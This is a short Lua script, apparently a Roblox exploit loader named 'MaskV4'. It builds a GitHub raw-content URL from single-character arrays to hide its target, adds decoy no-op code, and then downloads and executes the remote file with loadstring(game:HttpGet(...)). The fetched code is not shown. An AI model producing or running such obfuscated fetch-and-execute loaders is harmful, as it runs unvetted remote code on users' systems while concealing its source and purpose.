

local a = {"h","t","t","p","s",":","/","/"}
local b = {"r","a","w",".","g","i","t","h","u","b","u","s","e","r","c","o","n","t","e","n","t",".","c","o","m","/"}


local c = {
    "M","a","s","k","e","d","R","B","L","X","/",
    "M","a","s","k","e","d","/","m","a","i","n","/",
    "V","i","p","G","o","o","n"
}


local fake = {"ohio","sigma","skull","npc","banana"}
for i = 1,#fake do
    fake[i] = fake[i]:reverse():reverse() -- does nothing lol
end

local function sus(t)
    local s = ""
    for _,v in ipairs(t) do 
        s = s..v 
    end
    return s
end

local link = sus(a)..sus(b)..sus(c)


link = link:gsub("Masked","Masked")

local ok, err = pcall(function()
    loadstring(game:HttpGet(link))()
end)

if not ok then
    warn("[MaskV4] Failed to load: "..tostring(err))
end
